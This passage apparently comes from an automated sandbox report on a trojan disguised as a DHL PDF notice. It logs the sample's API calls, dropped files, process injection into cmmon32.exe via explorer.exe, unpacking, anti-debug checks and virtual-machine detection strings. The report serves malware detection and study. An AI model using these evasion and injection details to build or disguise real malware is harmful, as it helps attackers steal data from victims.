          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0041E663 NtClose,3_2_0041E663
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0041E713 NtAllocateVirtualMemory,3_2_0041E713
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0041E52E NtCreateFile,3_2_0041E52E
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0041E5DD NtReadFile,3_2_0041E5DD
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A398F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_00A398F0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39860 NtQuerySystemInformation,LdrInitializeThunk,3_2_00A39860
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39840 NtDelayExecution,LdrInitializeThunk,3_2_00A39840
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A399A0 NtCreateSection,LdrInitializeThunk,3_2_00A399A0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_00A39910
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39A20 NtResumeThread,LdrInitializeThunk,3_2_00A39A20
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_00A39A00
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39A50 NtCreateFile,LdrInitializeThunk,3_2_00A39A50
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A395D0 NtClose,LdrInitializeThunk,3_2_00A395D0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39540 NtReadFile,LdrInitializeThunk,3_2_00A39540
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A396E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00A396E0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_00A39660
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A397A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_00A397A0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39780 NtMapViewOfSection,LdrInitializeThunk,3_2_00A39780
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39FE0 NtCreateMutant,LdrInitializeThunk,3_2_00A39FE0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39710 NtQueryInformationToken,LdrInitializeThunk,3_2_00A39710
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A398A0 NtWriteVirtualMemory,3_2_00A398A0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39820 NtEnumerateKey,3_2_00A39820
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A3B040 NtSuspendThread,3_2_00A3B040
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A399D0 NtCreateProcessEx,3_2_00A399D0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39950 NtQueueApcThread,3_2_00A39950
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39A80 NtOpenDirectoryObject,3_2_00A39A80
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39A10 NtQuerySection,3_2_00A39A10
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A3A3B0 NtGetContextThread,3_2_00A3A3B0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39B00 NtSetValueKey,3_2_00A39B00
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A395F0 NtQueryInformationFile,3_2_00A395F0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39520 NtWaitForSingleObject,3_2_00A39520
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A3AD30 NtSetContextThread,3_2_00A3AD30
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39560 NtWriteFile,3_2_00A39560
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A396D0 NtCreateKey,3_2_00A396D0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39610 NtEnumerateValueKey,3_2_00A39610
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39670 NtQueryInformationProcess,3_2_00A39670
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39650 NtQueryValueKey,3_2_00A39650
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39730 NtQueryVirtualMemory,3_2_00A39730
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A3A710 NtOpenProcessToken,3_2_00A3A710
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39760 NtOpenProcess,3_2_00A39760
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39770 NtSetInformationFile,3_2_00A39770
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A3A770 NtOpenThread,3_2_00A3A770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529540 NtReadFile,LdrInitializeThunk,5_2_04529540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529560 NtWriteFile,LdrInitializeThunk,5_2_04529560
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045295D0 NtClose,LdrInitializeThunk,5_2_045295D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529650 NtQueryValueKey,LdrInitializeThunk,5_2_04529650
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529660 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_04529660
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529610 NtEnumerateValueKey,LdrInitializeThunk,5_2_04529610
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045296D0 NtCreateKey,LdrInitializeThunk,5_2_045296D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045296E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_045296E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529710 NtQueryInformationToken,LdrInitializeThunk,5_2_04529710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529FE0 NtCreateMutant,LdrInitializeThunk,5_2_04529FE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529780 NtMapViewOfSection,LdrInitializeThunk,5_2_04529780
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529840 NtDelayExecution,LdrInitializeThunk,5_2_04529840
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529860 NtQuerySystemInformation,LdrInitializeThunk,5_2_04529860
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_04529910
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045299A0 NtCreateSection,LdrInitializeThunk,5_2_045299A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529A50 NtCreateFile,LdrInitializeThunk,5_2_04529A50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0452AD30 NtSetContextThread,5_2_0452AD30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529520 NtWaitForSingleObject,5_2_04529520
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045295F0 NtQueryInformationFile,5_2_045295F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529670 NtQueryInformationProcess,5_2_04529670
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0452A770 NtOpenThread,5_2_0452A770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529770 NtSetInformationFile,5_2_04529770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529760 NtOpenProcess,5_2_04529760
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0452A710 NtOpenProcessToken,5_2_0452A710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529730 NtQueryVirtualMemory,5_2_04529730
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045297A0 NtUnmapViewOfSection,5_2_045297A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0452B040 NtSuspendThread,5_2_0452B040
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529820 NtEnumerateKey,5_2_04529820
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045298F0 NtReadVirtualMemory,5_2_045298F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045298A0 NtWriteVirtualMemory,5_2_045298A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529950 NtQueueApcThread,5_2_04529950
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045299D0 NtCreateProcessEx,5_2_045299D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529A10 NtQuerySection,5_2_04529A10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529A00 NtProtectVirtualMemory,5_2_04529A00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529A20 NtResumeThread,5_2_04529A20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529A80 NtOpenDirectoryObject,5_2_04529A80
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04529B00 NtSetValueKey,5_2_04529B00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0452A3B0 NtGetContextThread,5_2_0452A3B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DC870 NtClose,5_2_027DC870
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DC840 NtDeleteFile,5_2_027DC840
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DC920 NtAllocateVirtualMemory,5_2_027DC920
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DC740 NtCreateFile,5_2_027DC740
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DC7F0 NtReadFile,5_2_027DC7F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DC73B NtCreateFile,5_2_027DC73B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DC7EA NtReadFile,5_2_027DC7EA
          Source: DHL_Notice_pdf.exeReversingLabs: Detection: 46%
          Source: DHL_Notice_pdf.exeVirustotal: Detection: 42%
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeFile read: C:\Users\user\Desktop\DHL_Notice_pdf.exeJump to behavior
          Source: DHL_Notice_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\DHL_Notice_pdf.exe C:\Users\user\Desktop\DHL_Notice_pdf.exe
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.t
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeProcess created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe "C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe" C:\Users\user\AppData\Local\Temp\thztifyh.tJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeProcess created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exeJump to behavior
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lockJump to behavior
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsd7F3B.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/5@14/7
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6132:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: DHL_Notice_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: cmmon32.pdb source: zkvixbqxp.exe, 00000003.00000002.274188632.0000000000920000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: zkvixbqxp.exe, 00000003.00000002.274188632.0000000000920000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: zkvixbqxp.exe, 00000001.00000003.241452408.0000000019FF0000.00000004.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000001.00000003.241643888.000000001A180000.00000004.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.0000000000AEF000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000003.245869729.0000000000838000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.273703792.0000000004189000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.275305652.000000000432B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: zkvixbqxp.exe, zkvixbqxp.exe, 00000003.00000002.274212822.0000000000AEF000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000003.245869729.0000000000838000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.273703792.0000000004189000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.275305652.000000000432B000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeUnpacked PE file: 3.2.zkvixbqxp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0041B1FB push esi; iretd 3_2_0041B1FC
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0040DAA5 push edi; retf 3_2_0040DAAE
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0041B369 push es; retf 3_2_0041B3A3
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00422C58 push dword ptr [057DC0C6h]; ret 3_2_00422C7C
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0041C4AA push ecx; retf 3_2_0041C4AF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0041BDCE push esp; ret 3_2_0041BDCF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00401DF0 push eax; ret 3_2_00401DF2
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00406F32 push C87026BFh; retf 3_2_00406F37
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A4D0D1 push ecx; ret 3_2_00A4D0E4
          Source: C:\Windows\explorer.exeCode function: 4_2_0B736F57 push ebx; retn 4855h4_2_0B736F60
          Source: C:\Windows\explorer.exeCode function: 4_2_0B73213D push ds; iretd 4_2_0B732141
          Source: C:\Windows\explorer.exeCode function: 4_2_0B736EC9 push cs; retf 4_2_0B736ECA
          Source: C:\Windows\explorer.exeCode function: 4_2_1194113D push ds; iretd 4_2_11941141
          Source: C:\Windows\explorer.exeCode function: 4_2_11945EC9 push cs; retf 4_2_11945ECA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0453D0D1 push ecx; ret 5_2_0453D0E4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027C513F push C87026BFh; retf 5_2_027C5144
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027E0E65 push dword ptr [057DC0C6h]; ret 5_2_027E0E89
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DA6B7 push ecx; retf 5_2_027DA6BC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027D9FDB push esp; ret 5_2_027D9FDC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027D9408 push esi; iretd 5_2_027D9409
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027CBCB2 push edi; retf 5_2_027CBCBB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027D9576 push es; retf 5_2_027D95B0
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeJump to dropped file
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-518
          Source: C:\Windows\explorer.exe TID: 5172Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 5128Thread sleep time: -54000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A26A60 rdtscp 3_2_00A26A60
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 879Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 871Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeAPI coverage: 6.5 %
          Source: C:\Windows\SysWOW64\cmmon32.exeAPI coverage: 8.4 %
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 1_2_004207DA GetSystemInfo,1_2_004207DA
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027D31A0 FindFirstFileW,FindNextFileW,FindClose,5_2_027D31A0
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-3480
          Source: explorer.exe, 00000004.00000003.473645916.000000000F4FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.514671889.000000000F4FD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW5
          Source: explorer.exe, 00000004.00000002.512635154.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
          Source: explorer.exe, 00000004.00000002.512635154.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.253345613.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000004.00000003.476512956.0000000009054000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
          Source: explorer.exe, 00000004.00000002.512635154.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
          Source: explorer.exe, 00000004.00000000.250169139.0000000005063000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
          Source: explorer.exe, 00000004.00000002.514284558.000000000F270000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWua%SystemRoot%\system32\mswsock.dllEdgeSquare44x44.pngY
          Source: explorer.exe, 00000004.00000003.476512956.0000000009054000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A26A60 rdtscp 3_2_00A26A60
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 1_2_00420109 mov eax, dword ptr fs:[00000030h]1_2_00420109
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 1_2_0042005F mov eax, dword ptr fs:[00000030h]1_2_0042005F
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 1_2_0042017B mov eax, dword ptr fs:[00000030h]1_2_0042017B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 1_2_0042013E mov eax, dword ptr fs:[00000030h]1_2_0042013E
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]3_2_00A220A0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]3_2_00A220A0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]3_2_00A220A0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]3_2_00A220A0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]3_2_00A220A0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]3_2_00A220A0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A390AF mov eax, dword ptr fs:[00000030h]3_2_00A390AF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2F0BF mov ecx, dword ptr fs:[00000030h]3_2_00A2F0BF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2F0BF mov eax, dword ptr fs:[00000030h]3_2_00A2F0BF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2F0BF mov eax, dword ptr fs:[00000030h]3_2_00A2F0BF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F9080 mov eax, dword ptr fs:[00000030h]3_2_009F9080
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A73884 mov eax, dword ptr fs:[00000030h]3_2_00A73884
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A73884 mov eax, dword ptr fs:[00000030h]3_2_00A73884
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B8E4 mov eax, dword ptr fs:[00000030h]3_2_00A1B8E4
